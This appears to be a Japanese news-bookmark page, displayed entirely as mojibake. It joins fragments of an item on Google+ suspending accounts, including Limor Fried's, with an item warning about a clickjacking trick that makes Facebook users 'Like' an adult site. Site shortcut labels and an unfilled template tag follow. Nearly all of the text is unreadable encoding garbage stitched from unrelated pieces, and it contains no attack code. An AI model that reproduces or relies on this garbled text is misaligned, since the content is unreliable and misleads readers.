本å使用ã«é–¢ã™ã‚‹ã‚³ãƒŸãƒ¥ãƒ‹ãƒ†ã‚£ãƒ¼ã®æ¨™æº–è¦ç´„ã§è‹¦åŠ´ã—ã¦ã„る「Google+ã€ã«ãŠã„ã¦ã€ã“ã®24時間ã§ã‹ãªã‚Šã®æ•°ã®ã‚¢ã‚«ã‚¦ãƒ³ãƒˆãŒå‰Šé™¤ã•ã‚Œã€ãƒ¦ãƒ¼ã‚¶ãƒ¼ã«ç–Žå¤–æ„Ÿã¨æ怖を与ãˆã¦ã„る。 Limor Friedæ°ï¼ˆåˆ¥åAdafruit Industriesã®Ladyada)ã®ã‚¢ã‚«ã‚¦ãƒ³ãƒˆã¯ä¸€åº¦å‰Šé™¤ã•ã‚ŒãŸãŒã€å½±éŸ¿åŠ›ãŒå¤§ãã„ã“ã¨ã‹ã‚‰å¾©å…ƒã•ã‚ŒãŸã€‚Friedæ°ã¯å…ˆé ƒã€WIRED Magazineã®è¡¨ç´™ã«å–り上ã’られã¦ã„る。 Googleã¯Limor Friedæ°ã®Google+プãƒãƒ•ã‚£ãƒ¼ãƒ«ã€ŒLadyadaã€ã‚’一時åœæ¢ã—ãŸãŒã€ä¸æº€ã®å£°ãŒæ®ºåˆ°ã—ãŸå¾Œã€ä¸æ€è°ãªã“ã¨ã«åŒæ°ã®ã‚¢ã‚«ã‚¦ãƒ³ãƒˆã¯å¾©å…ƒã•ã‚ŒãŸã€‚削除ã•ã‚ŒãŸã»ã‹ã®ã‚¢ã‚«ã‚¦ãƒ³ãƒˆã¯Friedæ°ã®ã‚ˆã†ãªæœ‰åˆ©ãªç«‹å ´ã«ã¯ãªã„ã€ã¨è¨€ã†ã«ã¨ã©ã‚ã¦ãŠã“ã†ã€‚ 多ãã®ã‚¢ã‚«ã‚¦ãƒ³ãƒˆãŒå‰Šé™¤ã•ã‚Œã€è¨˜äº‹åŸ·ç†æ™‚点ã§ã‚る米国時間7月23日アカウントã®å¾©å…ƒã«ã¯è‡³ã£ã¦ã„ãªã„。 ç†è€…ã¯23æ—¥åˆå‰ã€éŽåŽ»ã®Google+é–¢
怪ã—ã’ãªå‹•ç”»çª“ã«æ³¨æ„──クリックã™ã‚‹ã¨ã‚¢ãƒ€ãƒ«ãƒˆã‚µã‚¤ãƒˆã‚’「ã„ã„ãï¼ã€
サイト上ã®å‹•ç”»çª“をクリックã—ãŸã‚‰ã‚¢ãƒ€ãƒ«ãƒˆã‚µã‚¤ãƒˆã‚’「ã„ã„ãï¼ã€ã—ã¦ã—ã¾ã£ãŸâ”€â”€ä¸€èˆ¬ã®ã‚µã‚¤ãƒˆã«è¦‹ã›ã‹ã‘ã¦Facebookã®ã„ã„ãï¼ã‚’押ã•ã›ã‚‹ã‚¯ãƒªãƒƒã‚¯ã‚¸ãƒ£ãƒƒã‚ングãŒè¦‹ã¤ã‹ã£ã¦ãŠã‚Šã€æ³¨æ„ãŒå¿…è¦ã 。 動画共有サイトã®ã‚ˆã†ãªãƒ‡ã‚¶ã‚¤ãƒ³ã®ã‚ã‚‹Webサイト。「生放é€ä¸ã«èµ·ããŸãƒãƒ—ニングï¼ã€ã¨ã„ã†ã‚¿ã‚¤ãƒˆãƒ«ã®å‹•ç”»çª“ã®å†ç”Ÿãƒœã‚¿ãƒ³ã‚’押ã™ã¨ã€å‹•ç”»ã¯å†ç”Ÿã•ã‚Œãšã€ã‚¢ãƒ€ãƒ«ãƒˆã‚µã‚¤ãƒˆã‚’ã„ã„ãï¼ã—ã¦ã—ã¾ã†ã€‚ã“ã†ã—ãŸã‚µã‚¤ãƒˆãŒè¤‡æ•°è¦‹ã¤ã‹ã£ã¦ã„る。 ã„ã„ãï¼ã—ã¦ã—ã¾ã†ä»¥å¤–ã®å®Ÿå®³ã¯ãªã„よã†ã ãŒã€å‹•ç”»çª“ã«é™ã‚‰ãšã€æ€ªã—ã’ãªã‚µã‚¤ãƒˆã¸ã®ã‚¢ã‚¯ã‚»ã‚¹ã¨ã‚µã‚¤ãƒˆä¸Šã§ã®ã‚¯ãƒªãƒƒã‚¯ã«ã¯æœ€å¤§é™ã®æ³¨æ„ãŒå¿…è¦ã€‚ã„ã„ãï¼ã¯Facebookトップページ左上ã®è‡ªåˆ†ã®ã‚¢ã‚¤ã‚³ãƒ³ã‹ã‚‰ã‚¢ã‚¯ã‚»ã‚¹ã—ãŸè‡ªåˆ†ã®ã‚¦ã‚©ãƒ¼ãƒ«ã‹ã‚‰ã€ã„ã„ãï¼ã—ãŸãƒªãƒ³ã‚¯ã”ã¨å‰Šé™¤ã™ã‚‹ã“ã¨ãŒã§ãる。 関連記事 Facebookã§ã‚¯ãƒªãƒƒã‚¯ã™ã‚‹ã¨åºƒãŒã‚‹ãƒ¯ãƒ¼ãƒ 的スパムã«æ³¨æ„ 「In order to PREVENT SPAM
1
リリースã€éšœå®³æƒ…å ±ãªã©ã®ã‚µãƒ¼ãƒ“スã®ãŠçŸ¥ã‚‰ã›
最新ã®äººæ°—エントリーã®é…ä¿¡
j次ã®ãƒ–ックマーク
kå‰ã®ãƒ–ックマーク
lã‚ã¨ã§èªã‚€
eコメント一覧を開ã
oページを開ã
ã‚ãªãŸã®ãƒ‘スワードã€ãƒãƒ¬ã¦ã¾ã™
{{#tags}}- {{label}}
{{/tags}}